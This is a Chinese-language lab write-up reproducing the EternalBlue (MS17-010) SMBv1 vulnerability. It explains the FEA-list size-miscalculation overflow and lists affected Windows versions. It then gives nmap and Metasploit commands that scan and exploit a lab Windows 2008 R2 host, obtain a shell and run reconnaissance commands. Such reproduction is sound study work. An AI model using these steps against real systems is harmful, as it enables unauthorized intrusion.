文章目录
- 漏洞原理
 - 漏洞影响范围
 - 复现环境
 - 复现步骤
 
漏洞原理
漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时。该函数在将FEA list转换成NTFEA(Windows NT FEA)list前,会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA list的大小。由于错误地使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大。当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出。
漏洞影响范围
目前已知受影响的Windows版本包括但不限于:Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2, Windows Server 2012 SP0等。
复现环境
- 任意一台受漏洞影响版本的虚拟机,本次实验采用 Windows 2008 R2
 - kali(nmap msf)
 
复现步骤
1.搭建好虚拟机环境(正确安装Windows 2008 R2)和kali(kali自带nmap和msf)
Windows 2008 R2:
 
kali:
 
2.用nmap扫描主机,判断版本和是否开启了445端口
 
 从图中可以看出,版本为windows2008 R2,并且开启了445端口,可能存在永恒之蓝漏洞。
3.msfconsole进入msf,找到ms17_010的模块并且use 3,run一下扫描是否存在漏洞
 

 4.设定攻击载荷并且开始攻击
 
 5.成功拿shell
 
 6.简单拍个照片保存到kali机器上
 
 命令参考:
 Nmap:nmap -A -sS -sV 192.168.153.130
 MSF:
 msfconsole
 search ms07_010
 use 3
 set RHOST 192.168.153.130
 run
 use 0
 set RHOST 192.168.153.130
 run
 cmd命令:
 sysinfo
 whoami
 arp
 netstat
 route print
 …



















